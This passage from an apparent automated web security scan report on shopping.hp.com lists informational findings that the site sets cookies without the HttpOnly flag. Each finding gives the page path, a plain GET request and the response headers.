Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:17:38 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...

6.47. http://www.shopping.hp.com/can/computer/categories/projector_accessories/2/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/projector_accessories/2/accessories

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlkpit%2Bf3Q9xMy%2Fiv1recgGb0ic%3D; expires=Friday, 28-Oct-2011 12:17:48 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:17:48 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /can/computer/categories/projector_accessories/2/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:17:48 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkpit%2Bf3Q9xMy%2Fiv1recgGb0ic%3D; expires=Friday, 28-Oct-2011 12:17:48 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:17:48 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...

6.48. http://www.shopping.hp.com/can/computer/categories/security_systems/2/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/security_systems/2/accessories

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlkrg9mS0Q17MCjrs1XbcAKYn2vi; expires=Friday, 28-Oct-2011 12:17:34 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:17:34 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /can/computer/categories/security_systems/2/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:17:33 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkrg9mS0Q17MCjrs1XbcAKYn2vi; expires=Friday, 28-Oct-2011 12:17:34 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:17:34 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!-- hps
...[SNIP]...

6.49. http://www.shopping.hp.com/can/computer/categories/software/1/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/software/1/accessories

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlkpiNyT2A16MyHsu1HYcwyZl2vi; expires=Friday, 28-Oct-2011 12:15:44 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:44 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /can/computer/categories/software/1/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:15:44 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkpiNyT2A16MyHsu1HYcwyZl2vi; expires=Friday, 28-Oct-2011 12:15:44 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:44 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...

6.50. http://www.shopping.hp.com/can/computer/categories/software/2/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/software/2/accessories

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlkoitmX3Q5%2FMSztuFfXdAGYmWvi; expires=Friday, 28-Oct-2011 12:15:45 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:45 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /can/computer/categories/software/2/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:15:45 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkoitmX3Q5%2FMSztuFfXdAGYmWvi; expires=Friday, 28-Oct-2011 12:15:45 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:45 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...

6.51. http://www.shopping.hp.com/can/computer/categories/speakers_headsets/1/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/speakers_headsets/1/accessories

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlkiit%2BV2AhwNCnpvVHYcAab0ic%3D; expires=Friday, 28-Oct-2011 12:16:15 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:16:15 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /can/computer/categories/speakers_headsets/1/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:16:15 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkiit%2BV2AhwNCnpvVHYcAab0ic%3D; expires=Friday, 28-Oct-2011 12:16:15 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:16:15 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...

6.52. http://www.shopping.hp.com/can/computer/categories/speakers_headsets/2/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/speakers_headsets/2/accessories

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlkoi9qQ2Qh5MCDislLYcQWd0ic%3D; expires=Friday, 28-Oct-2011 12:16:10 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:16:10 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /can/computer/categories/speakers_headsets/2/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:16:10 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkoi9qQ2Qh5MCDislLYcQWd0ic%3D; expires=Friday, 28-Oct-2011 12:16:10 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:16:10 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...

6.53. http://www.shopping.hp.com/can/computer/categories/storage_solutions/1/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/storage_solutions/1/accessories

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlkvjNue3Qx4NCnqslPfdgGbmGvi; expires=Friday, 28-Oct-2011 12:15:42 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:42 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /can/computer/categories/storage_solutions/1/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:15:42 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkvjNue3Qx4NCnqslPfdgGbmGvi; expires=Friday, 28-Oct-2011 12:15:42 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:42 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...

6.54. http://www.shopping.hp.com/can/computer/categories/storage_solutions/2/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/storage_solutions/2/accessories

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlkugt2X3wJ6MirislHXdACb0ic%3D; expires=Friday, 28-Oct-2011 12:15:43 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:43 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /can/computer/categories/storage_solutions/2/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:15:43 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkugt2X3wJ6MirislHXdACb0ic%3D; expires=Friday, 28-Oct-2011 12:15:43 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:43 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...

6.55. http://www.shopping.hp.com/can/computer/categories/tvs/1/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/tvs/1/accessories

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlktj9%2BS3w19Oi7sulDedwWd0ic%3D; expires=Friday, 28-Oct-2011 12:16:28 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:16:28 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /can/computer/categories/tvs/1/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:16:28 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlktj9%2BS3w19Oi7sulDedwWd0ic%3D; expires=Friday, 28-Oct-2011 12:16:28 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:16:28 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...

6.56. http://www.shopping.hp.com/can/computer/categories/tvs/2/accessories previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/can/computer/categories/tvs/2/accessories

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlkig9uW0QlwMirjvVXfdQWd0ic%3D; expires=Friday, 28-Oct-2011 12:16:35 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:16:35 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /can/computer/categories/tvs/2/accessories HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:16:35 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkig9uW0QlwMirjvVXfdQWd0ic%3D; expires=Friday, 28-Oct-2011 12:16:35 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:16:35 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!--
...[SNIP]...

6.57. http://www.shopping.hp.com/webapp/shopping/accessories_landing.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/webapp/shopping/accessories_landing.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlkvgtyT0QNwNS3rslfdcAad0ic%3D; expires=Friday, 28-Oct-2011 12:15:25 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:25 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/shopping/accessories_landing.do HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:15:25 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkvgtyT0QNwNS3rslfdcAad0ic%3D; expires=Friday, 28-Oct-2011 12:15:25 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:25 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 151068

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<style type="text/css">
.NewMpss{float
...[SNIP]...

6.58. http://www.shopping.hp.com/webapp/shopping/can.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/webapp/shopping/can.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlksitGU2g9wOyviu1XeeAWZ0ic%3D; expires=Friday, 28-Oct-2011 12:15:23 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:23 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/shopping/can.do HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:15:22 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlksitGU2g9wOyviu1XeeAWZ0ic%3D; expires=Friday, 28-Oct-2011 12:15:23 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:23 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 142188

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!-- hps
...[SNIP]...

6.59. http://www.shopping.hp.com/webapp/shopping/catalogRequest.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/webapp/shopping/catalogRequest.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlkqid6T2QN%2FNSHrslTccgWflmvi; expires=Friday, 28-Oct-2011 12:15:32 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:32 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/shopping/catalogRequest.do HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:15:32 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkqid6T2QN%2FNSHrslTccgWflmvi; expires=Friday, 28-Oct-2011 12:15:32 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:32 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 144557

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!-- hps
...[SNIP]...

6.60. http://www.shopping.hp.com/webapp/shopping/cto.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/webapp/shopping/cto.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlkqgtiV0Q16Ny7js1rcdgCb0ic%3D; expires=Friday, 28-Oct-2011 12:15:36 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:36 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/shopping/cto.do HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:15:35 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkqgtiV0Q16Ny7js1rcdgCb0ic%3D; expires=Friday, 28-Oct-2011 12:15:36 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:36 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 135326

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!-- hps
...[SNIP]...

6.61. http://www.shopping.hp.com/webapp/shopping/express_store.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/webapp/shopping/express_store.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlkridmV2A96MirrslXcdw2YmCWumQ%3D%3D; expires=Friday, 28-Oct-2011 12:15:30 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:30 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/shopping/express_store.do HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:15:30 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkridmV2A96MirrslXcdw2YmCWumQ%3D%3D; expires=Friday, 28-Oct-2011 12:15:30 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:30 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 142163

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!-- hps
...[SNIP]...

6.62. http://www.shopping.hp.com/webapp/shopping/feedback.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/webapp/shopping/feedback.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlkujtmS2Ap6NS7tu1bWeAbTng%3D%3D; expires=Friday, 28-Oct-2011 12:15:32 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:32 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/shopping/feedback.do HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:15:32 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkujtmS2Ap6NS7tu1bWeAbTng%3D%3D; expires=Friday, 28-Oct-2011 12:15:32 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:32 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 146897

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
<!-- hps
...[SNIP]...

6.63. http://www.shopping.hp.com/webapp/shopping/help.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/webapp/shopping/help.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlkojNyU3A19Ny7qvVfdeQKa0ic%3D; expires=Friday, 28-Oct-2011 12:15:24 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:24 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/shopping/help.do HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 12:15:24 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkojNyU3A19Ny7qvVfdeQKa0ic%3D; expires=Friday, 28-Oct-2011 12:15:24 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:24 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 144023

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<style type="text/css">
.NewMpss{float
...[SNIP]...

6.64. http://www.shopping.hp.com/webapp/shopping/home.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.shopping.hp.com
Path:	/webapp/shopping/home.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

hpshopping=1&user_id=mlktiN%2BQ0Qh6Oy%2FqvlfWcged0ic%3D; expires=Friday, 28-Oct-2011 12:15:23 GMT; path=/
hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 28-Oct-2011 12:15:23 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/shopping/home.do HTTP/1.1
Host: www.shopping.hp.com
Accept: */*
Accept-Language: en
